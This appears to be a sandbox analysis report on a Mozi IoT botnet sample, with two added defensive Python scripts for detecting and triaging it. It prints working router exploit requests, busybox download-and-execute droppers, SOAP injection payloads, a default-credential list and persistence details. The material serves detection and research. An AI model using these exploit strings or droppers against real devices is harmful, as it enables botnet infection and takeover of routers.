Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 200.123.205.169:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 34.98.66.83:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 45.144.3.201:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
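The requests above are the sample's exploitation templates fired at scanned hosts: the shell command is smuggled in the request-target (`/shell?`, `/cgi-bin/;`, `/language/Swedish`), in a query parameter (`setup.cgi?...&cmd=`, `board.cgi?cmd=`) or in the SOAPAction header (`/HNAP1/`), with `+` and `${IFS}` standing in for spaces that would break the request line. The `http://%s:%d/` in the embedded templates is filled in at run time; in this run the sandbox network supplied 192.168.1.1:8088. The detector below is an added example written for this report, not code from the sample, the sandbox vendor or any referenced project. It decodes a request head the way a CGI shell would see it, flags the injection markers, and pulls out the loader URL so the host can be blocked or hunted. The request heads are constructed from the templates shown above; the target addresses (203.0.113.x) and the marker names are this example's own choices.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample request heads, modelled on the exploit templates this
# report records (one per template plus a benign control). Target hosts are
# documentation addresses; the sandbox-simulated loader 192.168.1.1:8088
# stands in for whatever host fills the %s:%d slot on a real network.
SAMPLE_REQUESTS = [
    # JAWS webserver /shell? command injection
    "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1\r\n"
    "User-Agent: Hello, world\r\nHost: 203.0.113.10:80\r\n\r\n",
    # Netgear setup.cgi syscmd
    "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n"
    "Host: 203.0.113.11\r\n\r\n",
    # ${IFS} used in place of spaces inside the request-target
    "GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0\r\n"
    "Host: 203.0.113.12\r\n\r\n",
    "GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m HTTP/1.0\r\n"
    "Host: 203.0.113.13\r\n\r\n",
    # HNAP1: the injection sits in the SOAPAction header, not in the target
    "POST /HNAP1/ HTTP/1.0\r\nHost: 203.0.113.14:80\r\nContent-Type: text/xml; charset=\"utf-8\"\r\n"
    "SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`\r\n\r\n",
    # benign control
    "GET /index.html HTTP/1.1\r\nHost: 203.0.113.15\r\nUser-Agent: curl/8.0\r\n\r\n",
]

# A fetch command followed by the URL it downloads (optional flags skipped);
# the URL ends at whitespace or a shell metacharacter.
FETCH_URL = re.compile(r"\b(?:wget|curl)\s+(?:-\S+\s+)*(https?://[^\s;&|`'\"]+)")


def normalize(fragment):
    """Undo the encodings used to smuggle spaces past naive filters."""
    return unquote_plus(fragment).replace("${IFS}", " ")


def analyze_request(head):
    """Return injection indicators and loader URLs for one HTTP request head."""
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    # Every attacker-controlled surface, decoded the way a CGI shell would see it
    surfaces = [normalize(target)] + [normalize(v) for v in headers.values()]
    joined = "\n".join(surfaces)
    indicators = []
    if "${IFS}" in head:
        indicators.append("ifs_expansion")
    if re.search(r"[;|]|&&", target):
        indicators.append("shell_metachar_in_target")
    if "`" in joined or "$(" in joined:
        indicators.append("command_substitution")
    if re.search(r"\brm\s+-rf\s+(\*|/tmp|/var/tmp)", joined):
        indicators.append("tmp_wipe")
    if re.search(r"\bchmod\s+777\b", joined):
        indicators.append("chmod_777")
    loader_urls = FETCH_URL.findall(joined)
    if loader_urls:
        indicators.append("remote_fetch")
    return {
        "method": method,
        "target": target,
        "decoded_target": normalize(target),
        "indicators": indicators,
        "loader_urls": loader_urls,
        # a fetch plus any other injection marker is a drop-and-execute attempt
        "suspicious": bool(loader_urls) and len(indicators) >= 2,
    }


def loader_inventory(heads):
    """Count (host:port, filename) pairs so the loader can be blocked or hunted."""
    counts = Counter()
    for head in heads:
        for url in analyze_request(head)["loader_urls"]:
            hostport, _, path = url.partition("://")[2].partition("/")
            counts[(hostport, path.rsplit("/", 1)[-1])] += 1
    return counts


if __name__ == "__main__":
    for head in SAMPLE_REQUESTS:
        r = analyze_request(head)
        print(r["suspicious"], r["method"], r["decoded_target"][:60], r["indicators"])
    print(loader_inventory(SAMPLE_REQUESTS))
```

Feeding real proxy or IDS captures through `analyze_request` is a matter of reassembling each request head with CRLF line endings; the decoded target is what to put in a ticket, since it shows the command the device would actually have run.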

Spam, unwanted Advertisements and Ransom Demands

Source: /tmp/ZFvtIZszMd (PID: 5251) HTML file containing JavaScript created: /usr/networks Jump to dropped file

System Summary

Source: ZFvtIZszMd, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5249.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5247.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5268.1.000000001a019d01.000000004a78c7a2.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: Initial sample Potential command found: GET /c HTTP/1.0
Source: Initial sample Potential command found: GET %s HTTP/1.1
Source: Initial sample Potential command found: GET /c
Source: Initial sample Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample Potential command found: GET /%s HTTP/1.1
Source: Initial sample Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: admin1234
Source: ELF static info symbol of initial sample .symtab present: no
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /binols|head -n 1
Source: Initial sample String containing 'busybox' found: "\x%82xsage:/bin/busybox cat /binols|head -n 1
Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample String containing 'busybox' found: /bin/busybox!cat obin/ls|more
Source: Initial sample String containing 'busybox' found: dd bs=52 count=1(if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do$echo $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox dd"bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Source: classification engine Classification label: mal100.spre.troj.evad.lin@0/487@4/0
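SUSP_XORed_Mozilla fires because the sample carries its `Mozilla/5.0` User-Agent string XOR-encoded with a single byte, which is exactly what the YARA `xor` modifier brute-forces; the credential list, the busybox dropper commands and the `cfgtool set ... hw_ctree.xml` TR-069 tampering strings, by contrast, sit in the binary in the clear. The static triage below is an added example, not the YARA rule itself and not code from the report: it tries the 255 non-zero single-byte keys for the keyword the way the rule does, then extracts printable strings and matches them against the credential list and markers recorded above. The input is a constructed byte blob standing in for the sample, and the `.symtab` check is a crude name-in-string-table heuristic, not a section-header parse.

```python
import re
import sys

# Credential list exactly as recorded in this report's string findings
WEAK_CREDENTIALS = {"admin", "default", "support", "service", "supervisor", "guest",
                    "administrator", "123456", "54321", "password", "12345", "admin1234"}
KEYWORD = b"Mozilla/5.0"


def xor_bytes(data, key):
    """XOR every byte with a single-byte key."""
    return bytes(b ^ key for b in data)


def find_xored_keyword(data, keyword=KEYWORD):
    """(offset, key) pairs where `keyword` appears XOR-encoded with a single
    non-zero byte: the same search YARA's xor(0x01-0xff) modifier performs."""
    hits = []
    for key in range(1, 256):
        pattern = xor_bytes(keyword, key)
        pos = data.find(pattern)
        while pos != -1:
            hits.append((pos, key))
            pos = data.find(pattern, pos + 1)
    return hits


def extract_strings(data, min_len=4):
    """Printable ASCII runs, equivalent to `strings -n 4`."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def triage(data):
    """Pull the indicators this report lists out of one binary image."""
    strings = extract_strings(data)
    return {
        "xored_mozilla": find_xored_keyword(data),
        "weak_credentials": sorted(set(strings) & WEAK_CREDENTIALS),
        "busybox_commands": [s for s in strings if "busybox" in s],
        "tr069_tamper": [s for s in strings if "cfgtool set" in s or "hw_ctree.xml" in s],
        # heuristic: a .symtab section leaves its name in .shstrtab; stripped
        # binaries (".symtab present: no" above) normally do not contain it
        "symtab_name_present": b".symtab" in data,
    }


# Constructed stand-in for the sample: an ELF magic, a few credential strings,
# the XOR-encoded User-Agent (key 0x22) and two dropper/tamper strings.
SAMPLE_BLOB = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"admin\x00root\x00123456\x00password\x00hunter2\x00"
    + b"\x13\x37" * 6
    + xor_bytes(b"Mozilla/5.0 (Windows NT 10.0)", 0x22)
    + b"\x00/bin/busybox wget http://%s:%d/i\x00"
    + b"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\"\x00"
)

if __name__ == "__main__":
    # usage: python3 triage.py /path/to/sample   (no argument: the constructed blob)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for name, value in triage(blob).items():
        print(f"{name}: {value}")
```

Run it over a dropped file such as the `/usr/networks` copy to confirm it is the same payload as the submitted sample: the same XOR key and offset for the keyword, and the same credential and command strings, are a quick equivalence check before hashing.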

Persistence and Installation Behavior

Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/rcS.d/S95baby.sh Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/profile.d/cedilla-portuguese.sh Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/profile.d/im-config_wayland.sh Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/profile.d/gawk.sh Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/profile.d/01-locale-fix.sh Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/profile.d/apps-bin-path.sh Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/profile.d/Z99-cloudinit-warnings.sh Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/profile.d/vte-2.91.sh Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/profile.d/Z97-byobu.sh Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/profile.d/Z99-cloud-locale-test.sh Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/profile.d/xdg_dirs_desktop_session.sh Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /etc/profile.d/bash_completion.sh Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File: /proc/5251/mounts Jump to behavior
Source: /bin/sh (PID: 5255) Killall command executed: killall -9 telnetd utelnetd scfgmgr Jump to behavior
Source: /tmp/ZFvtIZszMd (PID: 5251) File written: /usr/networks Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251) Shell script file created: /etc/rcS.d/S95baby.sh Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5251) Shell script file created: /etc/init.d/S95baby.sh Jump to dropped file
Source: /tmp/ZFvtIZszMd (PID: 5264) Reads from proc file: /proc/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/5141/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1582/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/3088/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/230/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/110/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/231/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/111/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/232/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1579/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/112/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/233/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1699/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/113/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/234/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1335/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1698/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/114/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/235/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1334/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1576/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/2302/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/115/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/236/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/116/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/237/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/117/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/118/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/910/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/119/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/912/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/10/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/2307/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/11/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/918/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/5030/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/12/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/13/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/14/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/15/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/5155/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/16/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/17/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/18/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1594/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/120/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/5150/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/121/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1349/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/122/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/243/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/123/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/2/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/124/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/3/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/4/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/125/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/126/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1344/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1465/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1586/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/127/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/6/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/248/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/128/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/249/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/1463/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/800/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/9/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/801/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/20/stat Jump to behavior
Source: /usr/bin/killall (PID: 5255) File opened: /proc/21/stat Jump to behavior
